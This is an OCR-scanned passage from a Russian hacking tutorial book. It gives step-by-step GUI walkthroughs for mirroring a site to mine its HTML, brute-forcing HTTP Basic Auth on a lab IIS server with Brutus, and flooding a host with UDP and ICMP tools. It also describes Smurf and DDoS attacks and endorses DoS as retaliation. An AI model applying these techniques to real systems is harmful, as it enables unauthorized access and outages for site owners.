Самоучитель хакера

их из Web, прочитает гиперссылки из загруженных файлов Web-страниц, перей-дет по ссылкам на другие файлы, и так далее до завершения.

При создании файла проекта вы можете задать режим извлечения из сайтаWeb файлов только определенного типа и следования по ссылкам также толькоопределенного типа. Например, можно заставить Teleport Pro извлекать из Webтолько графические файлы и выполнять переходы только внутри домена по ука-занному стартовому адресу, или же указать «глубину» следования по ссылкам.Так что наш Web-спайдер может вести себя достаточно интеллектуально, не по-кидая того уголка сети Web, в который его поместили.

Рабочее окно программы Teleport Pro представлен на Рис. 8.13.

Рис. 8.13. Рабочее окно Teleport Pro напоминает окно проводника Windows

Для реализации всех описанных выше возможностей пользователю Teleport Proпредоставляется мастер создания проектов, к описанию работы которого мы иперейдем.

Мастер создания нового проектаДля создания нового проекта выполните такие шаги.

> В рабочем окне Teleport Pro выберите команду меню File » New Project Wizard(Файл » Мастер создания нового проекта). На экране появится первый диа-лог мастера создания нового проекта (Рис. 8.14).

В диалоге на Рис. 8.14 можно установкой переключателя выбрать следующиеварианты применения Teleport Pro.

Create a browsable copy of website on my hard drive — Создать просматривае-мую копию Web-сайта на моем жестком диске.

132

Page 133: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

Welcome to the New Project Wizard!

The New Project Wizard makes it easy for you to setup andrun aTeleportPro project.

What do you want Teleport Pro to do?

0 Create a browsable copy of a website on my hard drive

О Duplicate awebsite, including directory structure

О Search a website for files of a certain type

О Explore every site linked from a central site

О Retrieve one or more files at known addresses

О Search awebsite torkeywords

I

Рис. 8.14. Первый диалог мастера создания нового проектапозволяет выбрать один из инструментов Teleport Pro

Duplicate a website, including directory structure — Дублировать Web-сайт,включая структуру каталогов.

Search a website for files of certain type — Поиск на Web-сайте файлов определен-ных типов.

Explore every site linked from a central site — Исследовать все сайты, указанныессылками из центрального сайта.

Retrieve one or more files at known addresses — Извлечь один или более файловс известными адресами.

Search a website for keyword — Поиск в Web-сайте по ключевым словам.

Project Wizard — Step 2 of 4

Starting Address

Enter an Internet address to serve es the starting location forthis project. Examples of valid Internet addresses are»www. micro soft. com», «www.netscape.com/products/», and»www.ibm.com/home/ind8x.htm».

Mow deeply would you like Teleport to explore?

Up to |3 ~J links from this starting point

(If you want to add more starting addresses to your projectlater, use the «New Address» menu command, or press the»New Address» button on the toolbar.)

I

Рис. 8.15. Второй диалог мастера создания нового проектапозволяет указать стартовый адрес для поиска в Web

133

Page 134: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Выберите для начала первый вариант — создание просматриваемой копии Web-сайта на своем жестком диске. В первом диалоге мастера создания нового про-екта он установлен по умолчанию, так что просто щелкните на кнопке Next(Далее). На экране появится диалог следующего шага работы мастера (Рис. 8.15).

„* При указании стартового адреса учтите, что адреса Интернетачувствительны к регистру букв. Далее, примите во внимание,что описываемая версия Teleport Pro 1.29.1959 поддерживает ра-боту только с серверами HTTP и FTP.

В поле вверху диалога укажите начальный адрес для поиска в Web; есливам необходимо задать несколько стартовых адресов, далее их можно бу-дет добавить с помощью команды New Address (Новый адрес) на панелиинструментов.

В поле Up to … links from this starting point (До … ссылок из этой стартовойточки) укажите глубину поиска в Web по числу переходов по ссылкам, начи-ная от стартовой точки (по умолчанию задано 3).

Щелкните на кнопке Next (Далее) и перейдите в диалог следующего шагамастера создания нового проекта (Рис. 8.16).

Project Configuration

When dealing the local website, retrieve:

О Justtexl

О Text end graphics

О Text graphics, and sound

<3> Everything

If you need an account and password to access this site, enterthem here.

I L

Puc. 8.16. В этом диалоге вы можете настроить свой проект

В диалоге на Рис. 8.16 укажите, какие файлы следует извлекать из Web присоздании локальной копии сайта. Имеются следующие возможности:

• Just text (Только текст) — загрузка только текстовых файлов.

• Text and graphics (Текст и графика) — загрузка текстовых и графическихфайлов.

134

Page 135: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

• Text, graphics, and sound (Текстовые, графические и звуковые файлы) -загрузка текстовых, графических и звуковых файлов.

• Everything (Все) — загрузка всех файлов.

Если необходимо, создайте учетную запись для доступа к созданному сай-ту, введя в поле Account (Учетная запись) свой логин, а в поле Password(Пароль) — пароль.

Щелкните на кнопку Next (Далее) и перейдите в следующий диалог мастерасоздания нового проекта (Рис. 8.17).

Congratulations!

YouVe just created oTeleport Pro project!

When you press Finish, you will be asked to save the projectChoose л name for it in the Save dialog box.

Teleport Pro will save the project then create a folder, namedpfier your project in which it will store any retreived files.

Whenyou’re readyto run the project pressthe Stari( )button on the toolbar, or select Start Irom the Project menu.

Puc. 8.17. Последний шаг создания проекта поздравляет вас с успехом!

В диалоге на Рис. 8.17 содержится поздравление и напоминание, что для запускапроекта следует щелкнуть на кнопке Start (Старт) на панели инструментов иливыбрать команду Start (Старт) из меню Project (Проект).

>• Щелкните на кнопке Finish (Готово) и в отобразившемся стандартном диа-логе (Рис. 8.18) сохраните файл проекта на диске.

Save in: | Si Teleport results <• а см’3 yahooщyahoo

Filename: Iklingonj

Save as type: [Teleport Pro Project C*.tpp)

Puc. 8.18. Для сохранения файла проекта программа Teleport Proпредлагает стандартный диалог

135

Page 136: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Настройка свойств проектаБолее тонкую настройку проекта можно выполнить с помощью диалога ProjectProperties (Свойства проекта), представленного на Рис. 8.19 и открываемогокомандой меню Project * Project Properties (Проект * Свойства проекта).

Summary | File Retrieval | Browsing/Mirroring | Exploration | Exclusions | Netiquette | Advanced

0 Always save KTML pages

D Re plicate the directory structure of remote servers

El Use MSIE-compatible filenames (appends .htm to HTML files where necessary)

El Localize links far а

•-Links for unretrieved

© Link to о messa

О Link to the Intern

0 Link to a place v

D Link using 0.3 filena

retrieved files

ge that explains why the file was not retrieved

et address for the file

*here the local file will be stored

mes

Relink all files in the project folder now

Cancel I I Apply

Puc. 8.19. Параметры создания дублированного сайтав диалоге свойств проекта

Диалог Project Properties (Свойства проекта) содержит семь вкладок, позво-ляющих настроить работу слайдера наиболее оптимальным образом. Мы ог-раничимся описанием настройки параметров дублирования и зеркальногоотображения сайта, выполняемой на вкладке Browsing/Mirroring (Про-смотр/Зеркальное отображение), представленной на Рис. 8.19.

Вкладка Browsing/Mirroring (Просмотр/ Зеркальное отображение) содержитмножество параметров, позволяющих уточнить способ сохранения файлов нажестком диске компьютера, например, необходимо ли «локализовать» ссылки всохраняемых страницах, заменив их ссылками на местоположение файлов впапках локального диска. Рассмотрим все эти параметры по порядку.

Флажок Always save HTML pages (Всегда сохранять страницы HTML) вынуж-дает Teleport Pro сохранять документы HTML, т.е. Web-странички, на локальномдиске, даже если все остальные параметры, задающие режим извлечения файловиз Web, этого не требуют. Для проекта, подготавливающего Web-сайт дляофлайнового просмотра, этот флажок должен быть установлен всегда, посколькуне все файлы Web-страничек имеют расширение .htm и .html.

• Флажок Replicate the directory structure of remote servers (Реплицироватьструктуру каталогов удаленного сервера) вынуждает спайдер сохранять из-

136

Page 137: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

влекаемые файлы в каталогах с такой же структурой, что и на сервере. Этовесьма удобно для работы с сайтом, поскольку «сваливая» все файлы в однукучу, можно потерять над ними контроль и перезаписать один файл другим.

• Флажок Use MSIE-compatible filenames (append .htm to HTML files wherenecessary) (Использовать имена файлов, совместимые с MSEE (добавлятьпри необходимости .htm к файлам HTML)) помогает браузеру IE определять,что файл содержит документ HTML, даже если расширение имени файла от-личается от .htm или .html (например, .shtml или .pi). С этой целью, в случаеустановки флажка, спайдер Teleport Pro переименовывает файлы документовHTML, присваивая расширения .htm или .html, одновременно перезаписываяссылки на эти файлы.

В группе элементов управления Linkage System (Система связывания) устанав-ливается, должен ли, и каким образом, спайдер перезаписывать ссылки насохраняемые файлы. Установка флажка Localize links for all retrieved files(Локализовать ссылки для всех извлекаемых файлов) включает режим локали-зации ссылок и делает доступными расположенные в разделе переключатели,управляющие перезаписью ссылок на файлы, не извлекаемые из Web. Имеетсятри возможности:

• Link to a message that explains why the file was not retrieved — связывать ссообщением, которое объясняет, почему файл не был извлечен. Это сообще-ние также будет отображать адрес Интернета для данного файла, так что, прижелании, его можно будет просмотреть в браузере.

• Link to the Internet address for the file — связывать с адресом Интернета дан-ного файла. В этом случае спайдер заменит ссылку на неизвлеченный файладресом Интернета для этого файла, так что файл можно будет просмотретьбраузером.

Link to a place where the local file will be stored — связывать с местом, в котороеэтот файл должен был быть помещен, т.е. спайдер должен «предсказать» месторазмещения неизвлеченного из Web файла и установить ссылку на это место.Такой режим работы позволит загружать Web-сайт на локальный диск посте-пенно, без необходимости повторного установления ссылок на вновь загру-женные файлы.

Спайдер Teleport Pro всегда локализует ссылки на внедренные вHTML-документ файлы, например, звуковые, графические, ап-леты Java, заменяя их «предсказанными» ссылками на их ло-кальное местоположение. Дело в том, что ссылки на эти фай-лы недоступны для пользовательского интерфейса — на нихнельзя щелкать мышью.

137

Page 138: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Находящийся внизу группы элементов управления Linkage System (Системасвязывания) флажок Link using 8.3 filenames (Связывать, используя имена фай-лов формата 8.3) заставляет слайдер локализовать файлы с использованием ста-рой, применяемой в DOS системы наименований файлов. При этом слайдер за-писывает файлы, сохраняя длинные имена, а ссылки на них перезаписываютсяименами формата 8.3.

Кнопка Relink all files in the project now (Заново связать все файлы в проекте)приводит к немедленной перезаписи всех ссылок для файлов HTML в папкепроекта, с использованием текущих настроек системы связывания.

Исследование кода ИТМРИтак, поработав, спайдер принес вам целую кучу файлов, создав локальную ко-пию Web-сайта. Что же следует искать в коде HTML этой локальной копииWeb-сайта? Как правило, создающие Web-сайт люди мало задумываются, на-сколько информативными могут оказаться сведения, которые они оставляют всвоих Web-страничках. Эти сведения не видны пользователю, просматриваю-щему страничку в браузере Web* но прекрасно видны в коде HTML. Что же тамможно найти?

Во-первых, это комментарии — пометки, оставляемые в коде для самого себя илидля других разработчиков сайта. Комментарии могут содержать фамилии, теле-фоны, адреса электронной почты, сведения технического характера — в общем,что угодно. Для хакера все это интересно, поскольку любая информация подоб-ного рода — это зацепка для начала хакинга.

Во-вторых, это ссылки на ресурсы сайта — пути к каталогам с документами, сце-нариями, рисунками — зная все это, легче построить план атаки на сервер, по-скольку яснее становится его организация и используемые средства. Вот, на-пример, как выполняется обработка форм, помещенных в Web-страничку попротоколу CGI. Для этого в коде HTML следует указать путь к CGI-сценарию,которому передаются все сведения из формы для последующей обработки.Эти сценарии могут быть испытаны на «надежность» отправкой специальносформированных запросов, в которых сценарию в качестве параметров переда-ется исполняемый код. И если сценарий не проверяет переданные параметры, товполне вероятно обнаружение дыры в системе защиты. Конечно, все это — путьдля весьма квалифицированного хакера.

Наилучшим путем для исключения ошибок такого рода, приводящим к наруше-нию системы защиты, следует признать использование только проверенныхсценариев, лучше всего последних версий, а также испытание созданного Web-сайта на безопасность с помощью специальных средств тестирования, например,приложения Retina (http://www.eeye.com/html/Products/Retina/). Далее, на сайтепрограммы Teleport Pro (http://www.tenmax.com) предоставляется для бесплат-

138

Page 139: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

ной загрузки и использования утилита очистки HTML-кода от всякой уязвимойинформации, помогающей хакеру в реализации планов атаки на сайт Web.

доступа к страничкамНу а что делать, если доступ к страничке Web закрыт паролем? В самом деле,имеются странички Web, которые защищены паролем по причинам, вдаваться вкоторые нет нужды — мы все об этом знаем. Доступ может быть закрыт как за-просом пароля из формы HTML, так и с помощью средств сервера HTTP.

В этом случае хакеру ничего не остается, как попробовать взломать пароль дос-тупа, и тут нам на помощь приходит старый добрый метод взлома грубой силой.Мы должны «забрутофорсить» Web-сайт, выполнив попытки многократноговхода с различными паролями и логинами.

Несколько попыток можно сделать вручную — ламеры еще не перевелись, и еслиадминистратор Web-сайта принадлежит к этой малопочтенной категории, то можнопопробовать пары логин/пароль в виде вариаций на тему Administrator/password(некоторые авторы, например, [3] утверждают, что такие входы имеет треть (!!!)серверов Web). Но лучше все же привлечь средства малой механизации и применитьпрограмму, скажем, Brutus Authentication Engine Test 2 (Машина тестов аутенти-фикации версии 2), сокращенно Brutus AET2 (http://www.hobie.net/brutus), опи-санную в Главе б, где мы с ее помощью взламывали чужие почтовые ящики.Теперь посмотрим, как это делается в случае серверов HTTP.

На Рис. 8.20 представлено рабочее окно программы Brutus.

Taigel |1.0.0.1

rConnection Options

Port I S ) I Connections

Type|HTTP[BasioAuth) |-| | Start [ Slop | Ctear |

10 Tmeout П Use Proxy I Define I

TIP (Basic) Option!

Method [HEAD M И К-eepAlive

:ion Option*

0 Use Username 0 Single User

Positive Authentication ResuUs

I Type I Username

HTTPlBasicAuth) Administrator

I Password

Timeout Reject AuthS« Thre*

991 ^Administrator R009 \\es Attempts per second

Рис. 8.20. Программа готова «брутофорсить» Web-сайт

139

Page 140: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Мы выполним атаку на систему базовой идентификации сервера IIS компьютераSword-2000, сделав такие шаги.

>• В поле Target (Цель) введите IP-адрес жертвы, в данном случае 1.0.0.1.

> В открывающемся списке Туре (Тип) выберите тип взламываемой системызащиты, что подразумевает выбор протокола доступа к серверу и метод ау-тентификации доступа к ресурсу. В данном случае выбран пункт HTTP (BasicAuthentication) (HTTP (Базовая аутентификация)) — взламывается доступ ксерверу HTTP, защищенного с помощью базовой аутентификации (подроб-нее о методах защиты доступа к IIS можно узнать из справочной системыWindows или в одном из многочисленных руководств по серверам IIS).

В группе элементов управления Authentication Options (Параметры аутентифи-кации) следует указать либо список логинов для тестирования в процессе взло-ма, либо указать единственный логин. Мы ограничимся логином Administrator,введя его в поле Use Username (Использовать имя пользователя), и сбросивфлажок Single User (Единственный пользователь).

>• В открывающемся списке Pass Mode (Режим поиска) выберите пункт BruteForce (Грубая сила), задав метод взлома грубой силой, т.е. прямым перебо-ром всех вариантов паролей.

>• Щелкните на ставшей доступной кнопке Range (Диапазон). На экране поя-вится диалог Brutus — Brute Force Generation (Brutus — Генерирование паро-лей прямым перебором), представленный на Рис. 8.21.

В диалоге Brutus — Brute Force Generation(Brutus — Генерирование паролей прямымперебором) делается основной выбор — сле-дует указать, какой длины может быть парольу сервера IIS и какие символы он может ис-пользовать. Тут все зависит от вашей творче-ской фантазии и удачи; для демонстрации мывыберем и в поле Min Length (Минимальнаядлина), и в поле Max Length (Максимальнаядлина) одно число — 3. Применяемые симво-лы мы ограничим цифрами, установив пере-ключатель Digits only (Только цифры).

Теперь все готово для атаки.

>• Щелкните на кнопке Start (Старт) в диалоге Brutus — АЕ2 (Рис. 8.20) и на-блюдайте за сообщениями и линейным индикатором внизу диалога. Резуль-тат представлен в диалоге Brutus — АЕ2 на Рис. 8.22.

Brutus — Brute Force

О Digits only

© Lowercase Alpha]

О Uppercase Alpha

О Mixed Alpha

О Alphanumeric

О Full Keyspoce

Generation Q

Min Length |0 |»-

Мех Length |б [-У

| OK | Cancel

О Custom Range |e7aoinsmldcumfpg^bvfcxjqzl 234567890 \

Puc. 8.21. Выбор символов и длинтестируемых строк

140

Page 141: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

^ ^ 11 X Brutus — AET2 — www.hoobie.net/brulu: — (January 2000) НШЗОШ

File Tool» Help

Target |1. 0.0.1.

I Port 1 30 Connections В рШ1 ‘

Method (HEAD PI 0 KeepA

0 Use Username 0 Single Usei

U sell D [Administrator

I Type I HTTP (Basic Auth] |-| | Start Stop | Clear

10 Timeout 10 П Use Proxy [ Define |

live

Pass Mode [Brute Force pj | Range 1 1 OfeWbutw) |

|Biw«*| Рак Fife lwrdi.txt ||Вг«к«|

Positive Authentication Results

Target

1.0.0.1/

1 Type 1 Username 1 Password 1

HTTP (Basic Auth) Administrator 007

Positive authentication at 1 .0.0.1/ with User : Administrator Password : 007 (992 attempts)Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992

тшшштшншш ^* **• **«« ^.™992 ||U:Adrniriistrator P:000 ||58 Attempts per second ||ldle /f

Puc. 8.22. Пароль доступа к IIS взломан!

Теперь, когда при обращении к взломанному серверу IIS отобразится диалог за-проса пароля, представленный на Рис. 8.23, вы будете знать, что туда следуетвводить.

Puc. 8.23. Введите в поля диалога найденные логин и пароль -и отобразится защищенная страничка Web

Кроме описанной возможности взлома базовой системы аутентификации, про-грамма Brutus позволяет взламывать парольную защиту, реализованную с по-мощью форм на страничках Web. Такая система защиты функционирует на ос-нове запросов CGI-сценариев Web-сайта. Выбрав в поле Туре (Тип) пункт HTTP(Form) (HTTP (Форма)) и настроив передачу запросов GET сценариям, можно

141

Page 142: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

подобрать пароль доступа к ресурсу, воспользовавшись теми же методами, что иописанный выше способ взлома грубой силой, или выполнить словарную атаку.

ЗаключениеСайты Web, поддерживаемые на подключенных к Интернету серверах корпора-тивной сети, — это наилучшие объекты для удаленного взлома доступа к инфор-мационным ресурсам организации. Для хакинга сайтов Web создано множествоутилит, часть из которых описана в этой главе. Следует однако учесть, что зада-ча хакинга такой системы вовсе не так проста, как это может показаться на пер-вый взгляд. Если раньше, в доисторическую эпоху систем Windows NT/95/98,достаточно было отсканировать Web-сайт программами типа CGI VulnerabilityScan или D@MNED CGI Scanner 2.1, найти несколько уязвимых сценариев, апотом с помощью эксплойтов, в изобилии представленных на хакерских Web-сайтах, без всяких проблем взломать доступ к ламерскому серверу, то нынче всеэто усложнилось.

Чтобы взломать настоящий, защищенный Web-сайт, приходится долго подыски-вать ключики к его уязвимостям, причем еще не факт, что удастся найти надеж-ные эксплойты для проникновения в сервер через найденную дыру в системезащиты. Так что наилучший способ хакинга сайтов Web — это внимательное от-слеживание новейших уязвимостей и самодельное изготовление эксплойтов,чаще всего представленных на Web-сайтах в виде исходных текстов программ.

Антихакер же должен помнить, что ныне имеется множество мощных про-граммных средств исследования безопасности Web-сайтов — например, прило-жение Retina, описание которого можно найти, например, в [7]. Другая возмож-ность создания надежной защиты Web-сайта — это испытание его на прочностьс помощью хакерских утилит, а для этого антихакер должен в совершенстве ов-ладеть методикой их использования.

142

Page 143: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 9 .

UoSСразу после появления и массового распространения сетей, построенных на ос-нове стека протоколов TCP/IP, хакеры занялись разработкой средств для выпол-нения в сетях TCP/IP действий, которые можно назвать настоящим кибертерро-ризмом. Эти действия, при всем их разнообразии, сводятся к одному — атакам,направленным на разрушение или нарушение нормального функционированияразличных сетевых сервисов и называемых атаками DoS (Denial of Service -Отказ в обслуживании). Технически атаки DoS реализуются с помощью про-грамм-эксплойтов, использующих уязвимости стека протоколов TCP/IP и сете-вого программного обеспечения.

Атаки DoS представляют собой сущее бедствие для современных сетевых ком-пьютерных систем, в особенности для Интернета. Ежегодно атаки DoS опусто-шают ресурсы различных сайтов Интернета, среди которых присутствуют такиеизвестные сайты, как Yahoo, eBay, CNN.com, www.Microsoft.com, приводя кфинансовым потерям их хозяев, исчисляемых миллионами долларов [3].Как правило, следствием таких атак является выход из строя серверов Интернетаиз-за перегрузки, что приводит к недоступности услуг этих сайтов и, следова-тельно, к потере возможных доходов.

Причины применения атак DoS могут быть самыми различными, начиная отпростого хулиганства и кончая самым настоящим кибертерроризмом, имеющимсвоей целью достижение, в том числе, определенных политических целей.Тем не менее, как справедливо указано в [3], для настоящего хакера атаки DoSне представляют особого интереса, вследствие их очевидной никчемности с точ-ки зрения доступа к информации. Мы, однако, не будем обсуждать цели, пре-следуемые «кул хацкерами», выполняющими атаку DoS против первого попав-шегося им под руку Web-сайта; заметим только, что для антихакера атаки DoSиногда становятся единственным средством защиты от нападений из сети. В са-мом деле, когда сразу с нескольких компьютеров на вас направляется целыйшквал сетевых пакетов, защититься от него можно только одним способом — по-слав в ответ «залп» из сетевого «орудия», представляющего собой аналог хакер-ского инструмента для атаки DoS.

В данном случае уместно напомнить, что деяния типа атакиDoS никак не могут понравиться ее жертвам, что может иметьдля хакера самые печальные последствия. Так что даже приме-няя атаку DoS против надоедливых киберхулиганов, помните,что нелишне предпринять те же меры защиты, что используютхакеры, — работайте через прокси-сервер и под защитой бранд-мауэра или системы IDS (например, BlacklCE Defender(http://blackice.iss.net/)), чтобы избежать раскрытия конфиденци-альности и возможной реакции объектов атаки.

Page 144: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

В этой главе мы вначале рассмотрим общую классификацию атак DoS, а потомрассмотрим разновидности этих атак вместе с некоторыми программами, во-шедшими в классический набор инструментов хакинга.

Разновидности атак’РоЗЦелью атаки DoS является приведение компьютерной системы в состояние,когда ее функционирование становится невозможным. Технически реализациятакой задачи может быть выполнена различными методами, поэтому чтобы бы-ло легче ориентироваться, мы разобьем атаки DoS на такие категории.

• Атаки насыщением полосы пропускания — отсылая на атакуемый хост боль-шое число пакетов, хакер перенасыщает полосу пропускания определеннойсети, скажем, Интернета (так был неоднократно атакован Web-сайт Yahoo).Такую атаку хакер может выполнить двояким образом. Если хакер исполь-зует сетевое подключение с большой полосой пропускания, скажем, Т1 (ши-рина 1544 Мбит/с), то ему ничего не стоит затопить пакетами сетевое соеди-нение с полосой пропускания, скажем, 56 Кбит/с (модемное подключение).Другой вариант — использование усиливающей сети, когда хакер используетне слишком быстрый канал связи, например, модемное соединение. В этомслучае с помощью определенной технологии хакер посылает поток пакетовна атакуемый хост сразу со всех компьютеров усиливающей сети.

• Атаки на истощение ресурсов — отсылая на атакуемый хост специально под-готовленные пакеты, хакер вынуждает атакуемый компьютер тратить своиресурсы на обработку этих пакетов. Происходит захват системных ресурсоватакуемого компьютера — центрального процессора, памяти и других, послечего хост выходит из строя.

• Атаки некорректными сетевыми пакетами — отсылая на атакуемый хост осо-бым образом искаженные пакеты, хакер нарушает работу сетевого программ-ного обеспечения или операционной системы компьютера. В таких атакахиспользуются уязвимости, связанные с ошибками в коде программныхсредств.

• Атаки фальсифицированными сетевыми пакетами — искажая сетевые пакеты,хакер принуждает хост изменить конфигурацию или состояние атакуемойкомпьютерной системы, что снижает ее производительность или даже приво-дит к некорректной работе хостов. Такие атаки основываются на уязвимостяхили плохой настройке системы защиты.

Опишем подробнее атаки DoS перечисленных разновидностей, проиллюстриро-вав их примерами атак, ставших «классикой» этой разновидности хакинга.

144

Page 145: Самоучитель хакера подробное иилюстрированное руководство

Атаки DoS

Агтаки насыщением полосы пропусканияЧтобы переполнить полосу пропускания линии связи атакуемого хоста, хакердолжен принять во внимание возможности своего собственного сетевого соедине-ния. Если хакерский компьютер напрямую подключен к Интернету через соедине-ние Т1, то ему вполне по силам в одиночку «завалить» любой Web-сайт [3], не го-воря уже о клиентах, работающих через модемные подключения. Выполнив лави-нообразное генерирование пакетов, хакер заполняет ими линию связи атакуемогохоста, после чего работа атакованного хоста в сети становится невозможной.

Для выполнения такой атаки существует множество инструментов, использую-щих различные сетевые протоколы. Рассмотрим работу двух, весьма популяр-ных программ — флудеры UDP и ICMP.

Все примеры атак DoS, рассмотренные в этой главе, будут ил-люстрироваться на экспериментальной локальной сети, кото-рую мы использовали в предыдущих главах для описания атак наслужбы электронной почты и /СО. Автор категорически отвер-гает всякую возможность использования этой информации длявыполнения реальных атак со своего компьютера и предупреж-дает о возможной ответственности.

Как явствует из названия, флудер UDP должен «затоплять» атакуемого клиентапакетами UDP, нарушая работу компьютера. Весьма удобной программой, реа-лизующей такую атаку DoS, можно назвать утилиту UDP Flooder 2.0 компанииFoundstone (http://www.foundstone.com), которая, вообще-то говоря, была соз-дана для проверки устойчивости хостов к атакам такого рода.

На Рис. 9.1 представлен диалог программы UDP Flooder 2.O.

Чтобы проиллюстрировать работу утилиты UDP Flooder 2.0, мы воспользуемсянашей экспериментальной сетью и выполним атаку DoS на компьютер А1ех-3с IP-адресом 1.0.0.5 с помощью такой последовательности действий.

> Запустите утилиту UDP Flooder 2.O.

у В поле IP/hostname (IP/имя хоста) введите IP-адрес или имя NetBIOS атакуе-мого компьютера — в данном случае введен IP-адрес 1.0.0.5.

> В поле Port (Порт) введите номер порта, в данном случае введен порт 80, по-скольку его используют HTTP-серверы.

145

Page 146: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

UDP Flondfir 2 ПО IP: 1.0.0.1^ __. .

11011

IP/hostname |1. 0.0.5 |

Т I I

ВВЕЗ1

Port [30 |

Max duration (sees) Infinite] | Max packets [[Infinite] |

min maxSpeed (pkts/sec) [-[

| 250 | . ~»VModem — >— Cable — >— Tl — >— LAN

© Random [20000 | to [30000 | bytes

О Text |»—’ UDFFlocH! Server eH’iste |

О From file | Brows» 1 1 |

Packets sent 903

Seconds elapsed 20.299

| Go

| Stop

Puc. 9.1. Подготовка атаки заливкой пакетов UDPне займет у вас много времени

Установите ползунок Speed (Скорость) в позицию LAN, поскольку мы ис-полняем атаку через локальную сеть.

В группе элементов управления Data (Данные) установите переключательRandom (Случайная генерация),что вынудит флудер генериро-вать и отсылать на атакуемый

£ • Windows Task Manager

File Opliont View Help

компьютер случайные данные.

> В ставшие доступными полясправа от переключателя введи-те значения, соответственно,20 000 и 30 000, установив дли-ну передаваемых пакетов.

> Щелкните на кнопке Go (Ата-ковать).

>• Когда вы сочтете, что с вашейжертвы достаточно, щелкните накнопке Stop (Стоп).

На Рис. 9.2 представлен результатвоздействия атаки на компьютерAlex-З в виде диалога диспетчеразадач, открытого на вкладке Net-working (Сеть).

Applications | Processes J Performance | Nettvi ing [

•Sword •

Adapter Name I Network Utilization I Link Speed I10 Mbps Operatic

[[Processes: 39 ||CPU Usage: 22% [[Commit Charge: 150620K / 47864 J

Puc. 9.2. Атака удалась — сетевоесоединение заполнено пакетами на 80%

146

Page 147: Самоучитель хакера подробное иилюстрированное руководство

Атаки DoS

Как видим, результат неплох — сетевое подключение занято в основном приемомпакетов UDP, реакция компьютера замедлена и мощности процессора на 50%заняты обработкой поступающей бессмысленной информации. И все это дос-тигнуто при использовании равноценных подключений — и хакер, и его жертваподсоединены к LAN типа Ethernet I DBase.

4>лус)ер ICMPФлудеры (или бомберы) ICMP (Internet Control Message Protocol — Протоколуправляющих сообщений Интернета) очень похож на только что рассмотренныйфлудер UDP. На Рис. 9.3 представлен диалог одного из флудеров X-Script ICMPBomber.

pt ICMP Bomber vO 3 By Code

Host |1.0.0.5

Packet Size: h ooOOO \ NumberToSenchhooo

Received 34464 bytes from 1.0.0.5 in 60 msecsReceived 34464 bytes from 1.0.0.5 in 60 msecsReceived 34464 bytes from 1.0.0.5 in 60 msecsReceived 34464 bytes from 1.0.0.5 in 60 msecsReceived 34464 bytes from 1.0.0.5 in 60 msecs

Рис. 9.З. Флудер X-Script ICMP Bomber весьма прост, но эффективен

Чтобы «зафлудить» неприятельский компьютер, хакеру достаточно в поле Host(Хост) указать IP-адрес или имя компьютера жертвы, после чего щелкнуть накнопке Ping (Пинг). При необходимости, в поле Packet Size (Размер пакета)можно задать размер пакетов, а в поле Number to Send (Количество пакетов) -число отсылаемых пакетов. Размер пакета весьма влияет на эффект примененияфлудера — большой размер пакета приводит к практически полному затоплениюсетевого соединения жертвы. На Рис. 9.4 представлен диалог диспетчера задач,показывающий загрузку сетевого соединения компьютера Alex-З (его IP-адресравен, как вы помните, 1.0.0.5).

Атака ICMP особенно эффективна еще и тем, что протокол ICMP (Internet Con-trol Message Protocol — Протокол управляющих сообщений Интернета) предна-значен для тестирования работы сети TCP/IP, и пакеты ICMP имеют высокийприоритет обслуживания. Так что флудеры ICMP могут быть весьма полезныминструментом разборки со всякого рода персонажами, не дающим проходаWeb-путешественникам; к тому же флудеры ICMP не требуют никаких особен-ных знаний для их использования.

147

Page 148: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Г» Windows Task Managei

File Options View Help

ааа

Applications I Processes I Performance I Networking

Processes: 38 ||CPU Usage: 5% \\Commb Charge: 1417Ж / 47864

Puc. 9.4. Атака DoS вполне удачна!

Aht3K3 Smurf

Но что делать, если намечаемая жертва подключена к сети через быстрое соеди-нение, а хакер не имеет доступа к достаточно мощному подключению, котороепозволит ему выполнить атаку DoS достаточно эффективно? Тогда хакеру сле-дует прибегнуть к более сложной атаке Smurf, которая заключается в следующем.

Вместо того, чтобы отсылать пакеты с хакерского компьютера, в атаке Smurfиспользуется усиливающая сеть. С хакерского компьютера на широковещатель-ный адрес усиливающей сети посылаются пакеты ECHO (Эхо) протокола ICMP,которые обычно используются для диагностики сети. В рассылаемых пакетах ха-кер подменяет исходный адрес пакетов IP-адресом атакуемого хоста, после чеговсе компьютеры усиливающей сети посылают ответные пакеты жертвенному ком-пьютеру. Эффект от такой атаки может быть весьма велик, поскольку если усили-вающая сеть состоит из нескольких десятков компьютеров, то один ЕСНО-запросразмером 10 Кбайт может вызвать лавину ответов общим объемом несколько ме-габайт, и сетевое соединение атакуемого компьютера просто захлебнется.

Другой, наиболее опасной атакой описываемой разновидности является распре-деленная атака DoS, или DDoS (Distributed DoS). Суть атак DDoS состоит в по-мещении на сетевых компьютерах программ-клиентов, работающих под управ-лением центральной консоли. В определенный момент времени по команде схакерской консоли эти клиенты, имеющие выразительное название «зомби»,

148

Page 149: Самоучитель хакера подробное иилюстрированное руководство

Атаки DoS

начинают атаку DoS по указанному адресу Интернета. Среди атак DDoS наибо-лее популярной является WinTrinoo (сайт разработчика находится по адресуhttp://www.bindview.com), которая, к тому же, представляет собой единствен-ную реализацию атаки DDoS на платформе Win32. В 2000 году атаками DDoSбыли поражены многие серверы Интернета, включая Web-сайты самых извест-ных фирм (этим, наверное, объясняется отсутствие на сайтах хоть сколько-нибудь работоспособной версии программ, реализующих атаку WinTrinoo).Для исследования и выявления компьютеров-зомби компания Foundstone пред-ложила программные средства, про которые мы еще поговорим в конце главы,где обсуждаются меры защиты от атак DoS.

